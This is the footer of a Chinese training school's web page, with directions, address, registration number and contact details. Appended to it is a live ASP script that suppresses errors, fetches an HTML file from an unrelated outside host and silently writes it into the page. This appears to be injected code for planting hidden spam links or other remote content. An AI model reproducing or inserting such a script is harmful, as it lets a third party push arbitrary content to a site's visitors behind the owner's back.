市内到昌南客运站乘1路专线车(南昌-莲塘)到省良种场下车即可。

中国和谐教育官方网站 版权所有:
南昌我能行教育训练学校 赣ICP备06006774号
学校地址:南昌市银三角英雄开发区内(在南昌昌昌南客运站乘1路专线车(南昌-莲塘)直接到省良种场下车即可)
联系电话:18970809066 0791-7187055 0791-5984918 邮 箱:
wnx2010@126.com
<%
On Error Resume Next
Server.ScriptTimeOut=9999999
response.write(getHTTPPage("http://www.0798xxw.cn/inc/lian.htm"))
function getHTTPPage(url)
dim http
set http=createobject("MSXML2.XMLHTTP")
Http.open "GET",url,false
Http.send()
if Http.readystate<>4 then
exit function
end if
getHTTPPage=bytes2BSTR(Http.responseBody)
set http=nothing
if err.number<>0 then err.Clear
end function
Function bytes2BSTR(vIn)
dim strReturn
dim i,ThisCharCode,NextCharCode
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>